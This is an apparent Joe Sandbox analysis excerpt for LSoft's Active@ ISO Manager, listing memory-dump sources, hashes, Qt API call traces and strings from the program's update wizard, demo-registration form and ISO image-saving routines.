                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@$?set$Widget@@$Meta$Char@@@Connection@Flags@Qt@@@@@$Layout@@Type@$?addFlag@$AlignmentLabel@@String@@@Variant@@Widget@$?arg@?connect@Char@@ConnectionLatin1Qt@@@View@@Wizard$?tr@AbstractPage@@Widget@@@$ItemTreeWindow$?fromArrayAscii_helper@Box@@Button@@CheckChecked@Concurrency::cancel_current_taskData@Object@@@Pixmap@Pixmap@@SelectionTitle@Typed$AccessAlternatingAnimated@Colors@ConversionDecorated@Enabled@ExternalHeight@ImageIndex@@Layout@Layout@@@Links@Manager@@MaximumMode@Mode@1@@ModelModel@@NetworkOpenPixmap@@@RootSpacing@StandardText@Wizard@@WordWrap@malloc
                                                                                                                  • String ID: %1 v. %2$1LatestVersion(QString)$1enableRollbacks()$1rollbackCheckboxClicked()$1showUpdateNotes()$1updateCheckboxClicked()$2LatestVersion(QString)$2clicked(const QModelIndex&)$2doubleClicked(const QModelIndex&)$2toggled(bool)$2toggled(bool)$:/images/watermark.png$<b>Network isn't operational!</b> Software update is not available.$<br>This wizard checks the software to be up to date$I agree to download && install the latest software update$Rollback current version to the previously installed version$http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3
                                                                                                                  • API String ID: 2034641309-3658138821
                                                                                                                  • Opcode ID: e55c0f7d462f5ad99d1b3b765b6da86cce231e56a34eee1b59c4aee3bd3f2e01
                                                                                                                  • Instruction ID: 0863b593165aede561367788264ea2b6fc15214716f499815d5b50e5308031c2
                                                                                                                  • Opcode Fuzzy Hash: e55c0f7d462f5ad99d1b3b765b6da86cce231e56a34eee1b59c4aee3bd3f2e01
                                                                                                                  • Instruction Fuzzy Hash: D8226136E25B0296EB10DF65E8565A93362FB49F94B481035DE4EB7B64DF3CE108C348
                                                                                                                  APIs
                                                                                                                  • ??0QWizardPage@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753B30
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753B50
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753B5B
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753B6D
                                                                                                                    • Part of subcall function 00007FF653754C60: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653754C86
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753B97
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753BB2
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753BC1
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753BDD
                                                                                                                  • ?setTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753BEA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753BF5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C00
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C0B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C16
                                                                                                                  • ?setSubTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C3A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C45
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C52
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753C5F
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QLabel@@QEAA@AEBVQString@@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753CB1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753CDD
                                                                                                                  • ??0QLineEdit@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753D05
                                                                                                                  • ?setBuddy@QLabel@@QEAAXPEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753D29
                                                                                                                  • ??0QLabel@@QEAA@AEBVQString@@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753D71
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753DA3
                                                                                                                  • ??0QLineEdit@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753DC4
                                                                                                                  • ?setValidator@QLineEdit@@QEAAXPEBVQValidator@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E0A
                                                                                                                  • ?setBuddy@QLabel@@QEAAXPEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E18
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E40
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E4A
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E72
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753E7C
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QLabel@@QEAA@AEBVQString@@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753EC4
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753EF2
                                                                                                                  • ?setWordWrap@QLabel@@QEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753F0A
                                                                                                                  • ??0QPushButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753F2B
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753F6E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753F79
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753F85
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753FAD
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753FB7
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753FC9
                                                                                                                  • ?registerField@QWizardPage@@IEAAXAEBVQString@@PEAVQWidget@@PEBD2@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753FE6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653753FF1
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754003
                                                                                                                  • ?registerField@QWizardPage@@IEAAXAEBVQString@@PEAVQWidget@@PEBD2@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754020
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF65375402B
                                                                                                                  • ??0QGridLayout@@QEAA@XZ.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF65375404A
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF65375407B
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754095
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF6537540AD
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF6537540C7
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF6537540E2
                                                                                                                  • ?addWidget@QGridLayout@@QEAAXPEAVQWidget@@HHV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF6537540FD
                                                                                                                  • ?setLayout@QWidget@@QEAAXPEAVQLayout@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754109
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754128
                                                                                                                    • Part of subcall function 00007FF65373C170: ??0QWidget@@QEAA@PEAV0@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C182
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setVisible@QWidget@@UEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1A3
                                                                                                                    • Part of subcall function 00007FF65373C170: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1B5
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1C6
                                                                                                                    • Part of subcall function 00007FF65373C170: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1E0
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1ED
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1F9
                                                                                                                    • Part of subcall function 00007FF65373C170: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C20B
                                                                                                                    • Part of subcall function 00007FF65373C170: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE ref: 00007FF65373C22F
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C23C
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C248
                                                                                                                    • Part of subcall function 00007FF65373C170: ?connectSlotsByName@QMetaObject@@SAXPEAVQObject@@@Z.QT5CORE ref: 00007FF65373C251
                                                                                                                    • Part of subcall function 00007FF65373C170: ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373C276
                                                                                                                    • Part of subcall function 00007FF65373C170: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373C2B0
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373C2BB
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,?,?,00000000,00000000,00000000,?), ref: 00007FF653754153
                                                                                                                  • ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS(?,?,?,?,?,?,?), ref: 00007FF653754172
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?), ref: 00007FF653754199
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?), ref: 00007FF6537541A3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?), ref: 00007FF6537541AD
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?), ref: 00007FF6537541B7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@Widget@@$?setMeta$Connection@Flags@Qt@@@@@$Type@$GridLayout@@$?addAlignmentFlag@Label@@Page@@Widget@Widget@@@Wizard$?connect@ConnectionQt@@@String@@@Window$?fromChar@@@$ArrayAscii_helper@Data@Edit@@LineName@Title@Typed$?arg@?register?resize@Buddy@Button@@Char@@Concurrency::cancel_current_taskField@Latin1Object@@@V0@@$?connect?move@?object?tr@?translate@?wizard@AbstractApplication@@CoreEnabled@Layout@Layout@@@ObjectPoint@@@PushSlotsText@Timer@@Utf8@Validator@Validator@@@Visible@Wizard@@WordWrap@malloc
                                                                                                                  • String ID: &Email Address:$&trade;$1keyChanged(const QString &)$1keyChanged(const QString &)$1registerClicked()$1storeDemoRegistration()$2demoRegistered()$2released()$2textChanged(const QString &)$2textChanged(const QString &)$Evaluate <i>%1</i>%2$N&ame:$Please fill both fields. Make sure to provide a valid email address.$Register$Successfully registered!$evaluate.email*$evaluate.name*
                                                                                                                  • API String ID: 1937606043-2202237722
                                                                                                                  • Opcode ID: ee03cf771f6b8ac138155cd22398e9ea34a1ccdb01fb16d39d67d14133b3597c
                                                                                                                  • Instruction ID: 8c480bf71875a9c6facb0ea2ecca5d0badc771063a3b2b155dc5a8344f817131
                                                                                                                  • Opcode Fuzzy Hash: ee03cf771f6b8ac138155cd22398e9ea34a1ccdb01fb16d39d67d14133b3597c
                                                                                                                  • Instruction Fuzzy Hash: E9126872E24B0296FB00DB61E8566A823B6FB89F94B491535CD1EB77A4EF3CD144C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Tree$Widget$Item@@$?setArrayChar@@@Data@@$String@@@$?text@ListLongLong@Text@$?from$?arg@Ascii_helper@Char@@Data@FileInfo@@Latin1TypedV1@_Widget@@$?allocate@?size@?sprintf@AllocationArray@@ByteData@@@@@Empty@Enabled@Flags@Option@Running@SortingThread@@U1@_V0@@View@@$?add?append@?at@?begin@?close@?current?sortChildren@Dir@Edit@@File@Index@Item@@@@@Items@LineList@Order@Qt@@@SleepSortUtf8@V1@@
                                                                                                                  • String ID: Added %1 item$Added %1 items
                                                                                                                  • API String ID: 873475785-2446875951
                                                                                                                  • Opcode ID: d1023a5e1724b06b9c00b65d690c6b25c3d9c3567b6eb15225c6550a2fec621c
                                                                                                                  • Instruction ID: 4a4ca671c1a026f4c0195f445831a41e858119c706573dcdd48595043e2475f8
                                                                                                                  • Opcode Fuzzy Hash: d1023a5e1724b06b9c00b65d690c6b25c3d9c3567b6eb15225c6550a2fec621c
                                                                                                                  • Instruction Fuzzy Hash: 79121C36E24A4296F710DFA1E8962AC2372FB89F89F494031D90EB7A64DF3CD549C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Burn_DestroyStar$Heap$Volume$CloseFreeHandleProcessString@@$Object@@$?activate@Array@@ByteMetaSleep
                                                                                                                  • String ID: Active@ ISO Manager$Error creating file: $Error creating image$Error reading from tree$Error writing to file$LSoft Technologies Inc$Saving image
                                                                                                                  • API String ID: 4023169691-1943611247
                                                                                                                  • Opcode ID: 02b99dba425b488532fe8c7458fa50791e1055ac95eac7b46450947eaef5e4e6
                                                                                                                  • Instruction ID: 8cefbdd078d9f6188ae0b13345f2155ec97e48b905e0491440ec5d85d563abee
                                                                                                                  • Opcode Fuzzy Hash: 02b99dba425b488532fe8c7458fa50791e1055ac95eac7b46450947eaef5e4e6
                                                                                                                  • Instruction Fuzzy Hash: 3C226132E29A4287EB20DB61E4923A973A2FB45F40F484035CB8EB7A65DF3CE545C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?setBar@@Progress$?arg@Array@@ByteChar@@Latin1Process@@V0@@Value@Wizard@@$?exit?next@?single?state@?value@?wizard@Code@Label@@Object@@Page@@ProcessShot@State@1@String@@@Text@Timer@@V0@$$Wizard
                                                                                                                  • String ID: 1InstallProgress()$<b><i>%1&trade;</i></b> has been successfully updated!<br><br>Installed the latest version <b>%2</b>$<b>Installation has been cancelled.</b>$<b>Installation was interrupted with exit code %1.</b>$<br><br><b>%1</b> ver. <b>%2</b> has been successfully downloaded:<br> <i>%3</i>$<br><br>You can still try executing software update manually.$Complete$Install Error #%1$Update Cancelled
                                                                                                                  • API String ID: 1599932458-1089336630
                                                                                                                  • Opcode ID: 42d8526908ce6976497349e9c82f2d7fb9cd4034abd52aa1661fe24902f8cf07
                                                                                                                  • Instruction ID: 9e622c540290df57936e1cff9f2bab471531ce7856f32cf714297f0d1326635e
                                                                                                                  • Opcode Fuzzy Hash: 42d8526908ce6976497349e9c82f2d7fb9cd4034abd52aa1661fe24902f8cf07
                                                                                                                  • Instruction Fuzzy Hash: 1CE16022E24902DAFB00DF64D8965EC2732FF85F59B891135E91EB3AA4DF2CD549C384
                                                                                                                  APIs
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A175
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A182
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A18D
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A197
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1A4
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1AF
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1B9
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1C7
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1D2
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A1F5
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A203
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A20E
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A231
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A23F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A24A
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A26D
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A27B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A286
                                                                                                                  • ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2A9
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65371B602), ref: 00007FF65371A2B7
